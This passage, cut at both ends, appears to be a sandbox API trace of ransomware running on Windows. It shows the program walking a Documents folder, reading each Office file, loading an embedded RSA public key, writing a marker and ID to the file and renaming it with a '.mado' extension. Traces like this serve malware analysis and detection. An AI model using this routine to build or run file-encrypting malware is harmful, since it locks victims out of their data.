lpFileSize=0x39cfb40*=46452) returned 1 [0204.100] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.102] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xb54e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.102] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.104] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xb574, lpOverlapped=0x0) returned 1 [0204.104] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.104] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.105] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.105] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.105] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.105] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.105] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.106] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.106] GetLastError () returned 0x0 [0204.106] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.106] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.106] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.106] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.106] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.106] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c6a8 [0204.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.107] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xb574, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.107] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.107] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.107] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.107] CloseHandle (hObject=0x63c) returned 1 [0204.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b74b68 [0204.108] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\owDXXAnogti1-3p.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\owdxxanogti1-3p.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\owDXXAnogti1-3p.xlsx.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\owdxxanogti1-3p.xlsx.mado")) returned 1 [0204.110] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa842f740, ftCreationTime.dwHighDateTime=0x1d5a10f, ftLastAccessTime.dwLowDateTime=0x7a3d8ed0, ftLastAccessTime.dwHighDateTime=0x1d573e4, ftLastWriteTime.dwLowDateTime=0x7a3d8ed0, ftLastWriteTime.dwHighDateTime=0x1d573e4, nFileSizeHigh=0x0, nFileSizeLow=0xf37, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pl91V.pptx", cAlternateFileName="PL91V~1.PPT")) returned 1 [0204.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff260 [0204.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2ef090 [0204.110] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pl91V.pptx") returned=".pptx" [0204.110] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pl91V.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pl91v.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.110] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=3895) returned 1 [0204.110] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.112] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xf11, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.112] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.114] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xf37, lpOverlapped=0x0) returned 1 [0204.114] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.114] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.114] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.114] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.115] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.115] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.115] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.115] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.115] GetLastError () returned 0x0 [0204.115] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.115] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.115] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.115] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.115] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.115] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c6a8 [0204.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b75ab0 [0204.116] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xf37, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.116] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.116] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.116] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.116] CloseHandle (hObject=0x63c) returned 1 [0204.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2c88 [0204.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x3b74b68 [0204.117] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pl91V.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pl91v.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pl91V.pptx.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pl91v.pptx.mado")) returned 1 [0204.118] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1395460, ftCreationTime.dwHighDateTime=0x1d5c2d1, ftLastAccessTime.dwLowDateTime=0xb3f5e620, ftLastAccessTime.dwHighDateTime=0x1d5d5ed, ftLastWriteTime.dwLowDateTime=0xb3f5e620, ftLastWriteTime.dwHighDateTime=0x1d5d5ed, nFileSizeHigh=0x0, nFileSizeLow=0x1582, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qwArXX-Y-.pptx", cAlternateFileName="QWARXX~1.PPT")) returned 1 [0204.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff260 [0204.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2ef090 [0204.118] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qwArXX-Y-.pptx") returned=".pptx" [0204.118] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qwArXX-Y-.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qwarxx-y-.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.119] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=5506) returned 1 [0204.119] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.121] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x155c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.121] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.122] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x1582, lpOverlapped=0x0) returned 1 [0204.123] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.123] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.123] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.123] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.124] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.124] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.124] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.124] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.124] GetLastError () returned 0x0 [0204.124] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.124] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.124] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.124] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.124] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.124] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c6a8 [0204.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b760f0 [0204.125] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1582, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.125] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.125] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.125] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.125] CloseHandle (hObject=0x63c) returned 1 [0204.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2c88 [0204.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b74b68 [0204.126] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qwArXX-Y-.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qwarxx-y-.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qwArXX-Y-.pptx.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qwarxx-y-.pptx.mado")) returned 1 [0204.127] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdea5cbf0, ftCreationTime.dwHighDateTime=0x1d5e511, ftLastAccessTime.dwLowDateTime=0xa61497c0, ftLastAccessTime.dwHighDateTime=0x1d58964, ftLastWriteTime.dwLowDateTime=0xa61497c0, ftLastWriteTime.dwHighDateTime=0x1d58964, nFileSizeHigh=0x0, nFileSizeLow=0xf569, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sxid0Link-5zZ7dsKVQV.docx", cAlternateFileName="SXID0L~1.DOC")) returned 1 [0204.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff260 [0204.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef090 [0204.127] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Sxid0Link-5zZ7dsKVQV.docx") returned=".docx" [0204.127] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Sxid0Link-5zZ7dsKVQV.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sxid0link-5zz7dskvqv.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.128] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=62825) returned 1 [0204.128] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.130] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xf543, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.130] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.132] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.132] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xf569, lpOverlapped=0x0) returned 1 [0204.133] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.133] lstrlenA (lpString="-----BEGIN PUBLIC 